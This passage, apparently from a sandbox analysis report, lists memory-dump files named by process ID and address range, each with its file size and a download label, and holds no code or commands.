152KB

Download
memory/1780-70-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/1780-55-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/2356-115-0x0000019C7A4D0000-0x0000019C7A528000-memory.dmp

Filesize
352KB

Download
memory/2356-77-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/2356-120-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/2356-101-0x0000019C7A1F0000-0x0000019C7A200000-memory.dmp

Filesize
64KB

Download
memory/2356-93-0x0000019C7A1F0000-0x0000019C7A200000-memory.dmp

Filesize
64KB

Download
memory/3484-14-0x00000216315A0000-0x00000216315C6000-memory.dmp

Filesize
152KB

Download
memory/3484-12-0x000002162F360000-0x000002162F370000-memory.dmp

Filesize
64KB

Download
memory/3484-52-0x00007FFEFC160000-0x00007FFEFCC21000-memory.dmp

Filesize
10.8MB

Download
memory/3484-17-0x0000021631980000-0x000002163198A000-memory.dmp

Filesize
40KB

Download
memory/3484-16-0x00000216319A0000-0x00000216319B2000-memory.dmp

Filesize
72KB

Download
memory/3484-15-0x0000021631960000-0x0000021631974000-memory.dmp

Filesize
80KB

Download
memory/3484-10-0x00007FFEFC160000-0x00007FFEFCC21000-memory.dmp

Filesize
10.8MB

Download
memory/3484-13-0x000002162F360000-0x000002162F370000-memory.dmp

Filesize
64KB

Download
memory/3484-5-0x0000021631410000-0x0000021631432000-memory.dmp

Filesize
136KB

Download
memory/3484-11-0x000002162F360000-0x000002162F370000-memory.dmp

Filesize
64KB

Download
memory/3784-98-0x0000015EC8DD0000-0x0000015EC8DE0000-memory.dmp

Filesize
64KB

Download
memory/3784-87-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/3784-100-0x0000015EC8DD0000-0x0000015EC8DE0000-memory.dmp

Filesize
64KB

Download
memory/3784-113-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/4572-133-0x000001C37F8E0000-0x000001C37F8F0000-memory.dmp

Filesize
64KB

Download
memory/4572-132-0x000001C37F8E0000-0x000001C37F8F0000-memory.dmp

Filesize
64KB

Download
memory/4572-131-0x00007FFEFC4E0000-0x00007FFEFCFA1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-116-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/5092-126-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/5092-127-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5092-125-0x00000000055B0000-0x00000000055BA000-memory.dmp

Filesize
40KB

Download
memory/5092-124-0x00000000055C0000-0x0000000005652000-memory.dmp

Filesize
584KB

Download
memory/5092-123-0x0000000005990000-0x0000000005F34000-memory.dmp

Filesize
5.6MB

Download
memory/5092-122-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5092-121-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download